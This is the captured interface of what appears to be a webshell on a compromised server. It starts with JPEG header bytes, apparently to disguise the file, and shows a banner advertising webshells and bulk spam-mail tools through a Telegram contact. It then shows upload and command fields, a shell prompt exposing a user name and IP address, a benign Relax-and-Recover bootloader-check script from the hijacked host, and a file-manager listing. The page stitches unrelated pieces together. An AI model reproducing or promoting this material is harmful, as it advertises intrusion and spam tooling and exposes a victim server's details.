����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.

# If the files of the used bootloader change then we should trigger a new savelayout or mkrescue.
# The layout/save/default/445_guess_bootloader.sh script created $VAR_DIR/recovery/bootloader file.
# An artificial bash array is used so that the first array element $used_bootloader is the used bootloader:
used_bootloader=( $( cat $VAR_DIR/recovery/bootloader ) )

# No quoting of the elements that are appended to the CHECK_CONFIG_FILES array together with
# the bash globbing characters like '*' or the [] around the first letter make sure
# that with 'shopt -s nullglob' files that do not exist will not appear
# so nonexistent files are not appended to CHECK_CONFIG_FILES
# cf. https://github.com/rear/rear/pull/2796#issuecomment-1117171070
case $used_bootloader in
    (EFI|GRUB2-EFI)
        CHECK_CONFIG_FILES+=( /boot/efi/EFI/*/grub*.cfg )
        ;;
    (GRUB|GRUB2)
        CHECK_CONFIG_FILES+=( /[e]tc/grub*.cfg /[b]oot/*/grub*.cfg )
        ;;
    (LILO)
        CHECK_CONFIG_FILES+=( /[e]tc/lilo.conf )
        ;;
    (ELILO)
        CHECK_CONFIG_FILES+=( /[e]tc/elilo.conf )
        ;;
    (PPC)
        # PPC arch bootloader can be :
        #  - LILO : SLES < 12
        #  - YABOOT : RHEL < 7
        #  - GRUB2 : SLES >= 12, RHEL >= 7, Ubuntu and other new Linux on POWER distro.
        CHECK_CONFIG_FILES+=( /[e]tc/lilo.conf /[e]tc/yaboot.conf /[e]tc/grub*.cfg /[b]oot/*/grub*.cfg )
        ;;
    (ARM|ARM-ALLWINNER)
        CHECK_CONFIG_FILES+=( /[b]oot/boot.scr )
        ;;
    (ZIPL)
        # cf. https://github.com/rear/rear/issues/2137
        # s390 - for rhel, ubuntu zipl config must be exist for restore.  sles > 11 does not use zipl directly
        CHECK_CONFIG_FILES+=( /[e]tc/zipl.conf )
        ;;
    (*)
        BugError "Unknown bootloader ($used_bootloader) - ask for sponsoring to get this fixed"
        ;;
esac

Filemanager

Name Type Size Permission Actions
300_list_dependencies.sh File 103 B 0644
310_autoexclude_usb.sh File 1.61 KB 0644
310_include_exclude.sh File 2.21 KB 0644
320_autoexclude.sh File 5.05 KB 0644
330_remove_exclusions.sh File 4.08 KB 0644
335_remove_excluded_multipath_vgs.sh File 2.23 KB 0644
340_generate_mountpoint_device.sh File 1.21 KB 0644
350_save_partitions.sh File 1.43 KB 0644
445_guess_bootloader.sh File 6.94 KB 0644
450_check_bootloader_files.sh File 1.96 KB 0644
450_check_network_files.sh File 879 B 0644
490_check_files_to_patch.sh File 2.19 KB 0644
550_barrel_devicegraph.sh File 3.66 KB 0644
600_snapshot_files.sh File 428 B 0644
950_verify_disklayout_file.sh File 16.57 KB 0644